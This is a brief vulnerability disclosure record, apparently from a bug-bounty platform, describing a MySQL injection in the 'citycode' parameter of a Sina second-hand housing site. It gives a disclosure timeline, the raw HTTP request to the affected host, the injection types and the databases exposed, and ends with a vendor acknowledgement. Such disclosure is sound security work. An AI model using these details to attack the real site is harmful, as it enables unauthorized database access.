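2016-04-24: Details reported to the vendor; awaiting vendor handling
2016-04-27: Vendor confirmed; details disclosed to the vendor only
2016-05-07: Details disclosed to core white hats and experts in related fields
2016-05-17: Details disclosed to regular white hats
2016-05-27: Details disclosed to intern white hats
2016-06-11: Details disclosed to the public
MySQL injection on a Sina site (three query types supported)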
GET /di/positioncommunity/?citycode=cd&x=104.03249595349092&y=30.607376004698764&callback=jsonp4&_=1461490791828 HTTP/1.1
Host: cd.esf.sina.com.cn
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 KoudailejuApp
Accept-Language: zh-cn
Referer: http://m.leju.com/touch/esf/cd?ln=ljmf_h5&source=ios&s=yd_kdlj
Accept-Encoding: gzip, deflate
Sina second-hand housing site
Injection parameter: citycode
Boolean-based injection
UNION query injection
64 databases nationwide
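Current database: 'shop_admin'
Current database user: '[email protected].%'
Filtering
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2016-04-27 15:49
Thank you for your attention to Sina security. The issue is being fixed.
None yet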